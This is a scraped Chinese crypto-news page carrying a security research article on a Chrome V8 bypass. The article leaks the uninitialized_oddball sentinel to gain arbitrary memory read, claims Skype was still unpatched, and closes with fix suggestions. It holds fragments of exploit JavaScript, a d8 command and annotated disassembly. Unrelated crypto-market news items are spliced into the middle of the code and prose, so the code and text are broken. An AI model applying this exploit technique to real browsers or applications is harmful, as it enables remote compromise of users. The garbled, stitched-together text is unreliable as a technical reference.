BTC/HKD+0.04%
ETH/HKD-0.03%
LTC/HKD+2.45%
DOT/HKD+2.67%
ADA/HKD+0.15%
SOL/HKD-0.04%
XRP/HKD+0.94%
DOGE/US+3.24%前言
Sentinelvalue(又名flagvalue/tripvalue/roguevalue/signalvalue/dummydata)是算法中的一個特殊值,通常在循環或遞歸算法中作為終止條件的特殊值存在。Chrome源碼中有很多Sentinelvalue。from-leaking-thehole-to-chrome-renderer-rce和TheHoleNewWorld-howasmallleakwillsinkagreatbrowser(CVE-2021-38003)中,都介紹了如何通過泄露TheHole對象實現CVE-2021-38003和CVE-2022–1364的沙箱內任意代碼執行。在我們發文闡述該緩解繞過大概一周后,谷歌團隊也迅速把這兩個在野CVE同步更新到了github上。時間節點如下:
{this</p>
<p> <b>fhi(f){this</b></p>
<p> flow(f){this</p>
<p> }functionUninitializedOddballExploiter(uninitialized_oddball){varh=newHelpers();letarr=newArray(0x1000000);arr=1</p>
<p> ;%PrepareFunctionForOptimization(read);read(exp2,0);%OptimizeFunctionOnNextCall(read);constold_space=0x200000;//0x200000letstart_offset=Math</p>
<p> 2-10年期美債收益率曲線倒掛幅度超100個基點,打破40多年來紀錄:金色財經報道,美國2年期國債收益率自1981年以來首次較10年期國債收益率高逾100個基點。2年期國債收益率盤中高達4.9974%,比10年期收益率高出100個基點以上。上一次2年期收益率低于10年期是在去年7月。美聯儲主席鮑威爾的講話暗示終端政策利率可能需要高于此前預期。利率互換合約價格顯示,3月加息50個基點的概率略高于加息25個基點。[2023/3/8 12:48:06]</p>
<p> }UninitializedOddballExploiter(%TheHole());//注意對%TheHole()做patch</p>
<p> 我們對上述代碼在v8-11.0.0中測試,當%TheHole()返回UninitializedOddball時,仍舊可以實現相對任意讀。</p>
<p> ./d8--expose-gc--allow-natives-syntax--print-opt-code--print-opt-code-filter=read--trace-turbo/home/avboy/Desktop/poc2.js</p>
<p> 對優化后的JavaScript的read函數去掉Prologue,留下關鍵反匯編如下所示:</p>
<p> 0x558b2000406929488b4d18REX.Wmovqrcx,0x558b2000406d2df6c101testbrcx,0x1;;checkifrcx(ie.obj,the1stargoffunction)is'Smi'0x558b20004070300f842e020000jz0x558b200042a4<+0x264>;;deoptreason'Smi'0x558b200040763641b831cd1900movlr8,0x19cd31;;(compressed)object:0x17140019cd31<Map(HOLEY_ELEMENTS)>0x558b2000407c3c443941ffcmpl,r8;;checkthemap(r8=0x19cd31isthemapofobj);;herewecheckthemapofobj,butwedidnotcheckthevalueofkey(ie.obj.prop);;andifwemakethevalueofkeytobeuninitialized_oddball,thereisthebypass0x558b20004080400f8522020000jnz0x558b200042a8<+0x268>;;deoptreason'wrongmap'0x558b2000408646448b410bmovlr8,;;*(addr(obj)+0xb)->r80x558b2000408a4a478b44060bmovlr8,;;r14ishighaddr0x558b2000408f4f4d03c6REX.Waddqr8,r14;;r8->inReadOnlySpace:#uninitialized0x558b2000409252458b4807movlr9,;;0x558b20004096564d03ceREX.Waddqr9,r14;;r9->0x2eb90000000d0x558b2000409959458b400bmovlr8,;;0x558b2000409d5d488b7d20REX.Wmovqrdi,;;rdiisindexofarr,the2ndargoffunction0x558b200040a16140f6c701testbrdi,0x1;;checkifrdiis'Smi'0x558b200040a5650f85da000000jnz0x558b20004185B5<+0x145>;;ifrdiisnot'Smi',JMP0x558b200040ab6b4c63dfREX.Wmovsxlqr11,rdi;;0x558b200040ae6e49d1fbREX.Wsarqr11,1;;r11/2,because'Smi'storedas'Smi'*2inMemory0x558b200040b1714d63c0REX.Wmovsxlqr8,r80x558b200040b47449d1f8REX.Wsarqr8,10x558b200040b7774d3bd8REX.Wcmpqr11,r8;;r11=0x40002,real_offsetastheindexofarr0x558b200040ba7a0f83ec010000jnc0x558b200042ac<+0x26c>;;deoptreason'outofbounds'0x558b200040c080c4817b1044d907vmovsdxmm0,;;movedoublefloatvaluetoxmm00x558b200040c787c5f92ec0vucomisdxmm0,xmm0;;ComparefloatvalueandSetEFLAGS0x558b200040cb8b0f8a88010000jpe0x558b20004259B9<+0x219>;;jpe(Jumpifparityeven)0x558b200040d1????91??0f8582010000?????????jnz?0x558b20004259??B9?<+0x219>??;;?jnz(Jump?if?not?zero)</p>
<p> 基于區塊鏈的會員制葡萄酒社區Crurated完成720萬美元融資:1月17日消息,使用區塊鏈技術的會員制葡萄酒社區 Crated 宣布完成 720 萬美元融資,將進一步創新基于區塊鏈的葡萄酒社區并擴大市場范圍。據悉,Crurated 于 2021 年推出,是一個會員制葡萄酒社區,旨在將鑒賞家與世界級生產商聯系起來,并通過通過區塊鏈和 NFT 來證明交易。[2023/1/17 11:16:56]</p>
<p> 在0x558b2000407c處,檢查了read函數的obj,確定其prop屬性正確,但沒有檢查以obj.prop為key的Value,而是直接按照JavaScript語義計算偏移,求取數組的數值。如此導致我們在計算的時造成類型混淆,實現任意讀。</p>
<p> 如上匯編所示,當我們傳入uninitialized_oddball時,從0x558b20004086開始以obj為起點計算,最終在vmovsdxmm0,指令中完成任意讀,數據保存在xmm0寄存器中。類似TheHole對象,由于uninitialized_oddball在v8內存中排序靠前,且對象內容更加原始,偽造更加容易,在TheHole緩解繞過修復后,該方法不失為繞過首選。同理,任意寫我們可以參考Issue1352549進行構造分析。由于原理雷同,這里不再贅述。</p>
<p> 這里修復建議是,對優化后的函數返回數組元素時,添加對數組map的檢查,避免直接計算偏移返回數組數值。</p>
<p> PatchGapAlert</p>
<p> 在我們談論PatchGap時,實際上我們不僅僅需要關注曾經出現的歷史漏洞,我們還要關注廠商在基礎組件中悄悄修復的漏洞。對Issue1352549分析后,我們迅速排查了可能存在PatchGap的軟件,這里不得不指出,截至目前Skype仍舊沒有對該漏洞進行修復。在x86下任意讀寫會稍有不同。x64下由于存在地址壓縮,在tuborgfun優化javascript生成的代碼中,v8會默認將基址加上。x86由于沒有基址,因此任意讀寫是直接相對于整個進程的。如下匯編所示:</p>
<p> BTC損失地址數達到歷史新高:金色財經報道,據Glassnode數據顯示,BTC損失地址數剛剛達到歷史新高,7日均值數額為18,959,514.625。[2022/7/5 1:50:54]</p>
<p> 0x3979b8ff3f8b790bmovedi,0x3979b902428b7f0bmovedi,0x3979b905458b4707moveax,;;eaxwillbeafixednumber0x3979b908488b7f0bmovedi,0x3979b90b4b8b5510movedx,0x3979b90e4ef6c201test_bdl,0x10x3979b911510f85b6000000jnz0x3979b9cd<+0x10d>0x3979b9175789d6movesi,edx0x3979b91959d1fesaresi,1;;esiisindex0x3979b91b5bd1ffsaredi,1;;0x3734b73a0x3979b91d5d3bf7cmpesi,edi0x3979b91f5f0f838e010000jnc0x3979bab3<+0x1f3>;;deoptreason'outofbounds'0x3979b92565c5fb104cf007vmovsdxmm1,xmm0,;;</p>
<p> 如上所示,esi為任意讀數組的索引,eax為固定值,edi為)
因此,在edi范圍內,可以任意讀寫。在具體做skype的exp時,雖然此時我們沒有地址壓縮帶來內存讀寫的便利,且skype開啟了aslr。但由于該文件太大,直接放在4GB內存中,黑客只需要對某個固定地址進行讀寫,便可以一個極大的概率讀寫skype文件中的內容。結合PE解析等傳統思路,不難完成整個漏洞利用鏈。基于此,我們無法保證黑客不能在短時間內完成整個利用鏈的適配。
MakerDAO關于5億枚DAI分配策略的民意投票結束:7月1日消息,MakerDAO關于如何分配5億枚DAI的MIP65民意提案現已結束投票,“用5億枚DAI的80%購買美國短期國債,20%購買IG Corp債券”的選項勝出。[2022/7/1 1:43:34]
這次PatchGap實際上不止需要排查Issue1352549,由于一個新的繞過方法的公開,直接導致了類似Issue1314616和Issue1216437的利用難度大幅度降低,黑客幾乎不需要花費任何研究成本,即可實現以往任何泄露uninitialized_oddball漏洞的完整利用,包括谷歌clusterfuzz提交的所有Issue中類似的漏洞。
總結
本文僅拋磚引玉,粗略來談通過泄露Sentinelvalue中的uninitialized_Oddball來實現任意讀原語。如第二部分所示,v8中的Sentinelvalue還有很多,實際上我們在測試Sentinelvalue的時候,也會經常容易遇到崩潰,不乏有非int3的崩潰出現。由于Uninitialized_Oddball和TheHole均已被證明可以在v8中實現環節繞過,我們有充分的理由懷疑其他Sentinelvalue也可能導致類似問題。
這也給我們一點提示:
01-其他uninitialized_Oddball泄露是否會輕松實現v8的RCE;
02-我們已經看到,谷歌會迅速將TheHole繞過進行修復,我們也看到利用垃圾回收實現ASLR繞過被長期擱置。這說明類似issue仍處在一個模糊邊界,即是否被正式當作安全問題對待。
Polygon上近30日新增1653萬枚NFT,總計發行量達1.19億:5月19日消息,據Polygon NFTScan數據顯示,截止5月19日,Polygon上已經發行1.19億枚NFT,開發者累計部署了11.9萬份NFT資產合約。近30天Polygon上新增了1653萬枚NFT,平均每天新增55萬枚NFT。[2022/5/19 3:27:40]
03-如果02中的問題被當作正式安全問題對待,那么在fuzzer中是否有必要考慮將%TheHole/uninitialized_Oddball等Sentinelvalue作為變量加入,來挖掘其他利用原語;
這里不得不強調的是,無論該類問題是否被正式當作安全問題對待,它都會大大縮減黑客實現完整利用周期。
參考資料
https://bugs.chromium.org/p/chromium/issues/detail?id=1314616
https://bugs.chromium.org/p/chromium/issues/detail?id=1352549
https://bugs.chromium.org/p/chromium/issues/detail?id=1216437
https://starlabs.sg/blog/2022/12-the-hole-new-world-how-a-small-leak-will-sink-a-great-browser-cve-2021-38003/
Tags:B20THEMOVVALUEB20幣The Midget’s SecretMovey Tokenvalue幣團隊
NFT界的CX教主@garyvee,前幾天發了一篇長文,“為什么我之前說97-99%的NFT會歸零”.
1900/1/1 0:00:005年前,我寫了一篇文章《礦工不是你的朋友?》,將MEV這個概念帶到了以太坊世界。當時,我們并沒有將這個概念稱為MEV.
1900/1/1 0:00:00一、過去一周行業發生重要事件 1.產業 外媒:幣安完成對Gopax的收購盡調,擬收購其41.2%的股份知情人士稱,Binance已于近日完成對韓國交易所Gopax的收購盡職調查.
1900/1/1 0:00:00自從2021年8月5日倫敦升級以來,結合費用銷毀機制,從經濟模型層面講,以太坊所有類型的鏈上活動都會助推ETH的燃燒.
1900/1/1 0:00:00簡介 零知識證明,特別是zk-SNARK(SuccinctNon-interactiveArgumentsofKnowledge)可能是Web3前沿最重要的技術之一.
1900/1/1 0:00:00還記得2021年牛市起勢的那段日子,被提到最多的人名,除了木頭姐CathieWood,就是巴菲特。當然巴菲特在加密貨幣行業,因為他不看好的言論,更多是被罵的.
1900/1/1 0:00:00
以太坊交易所
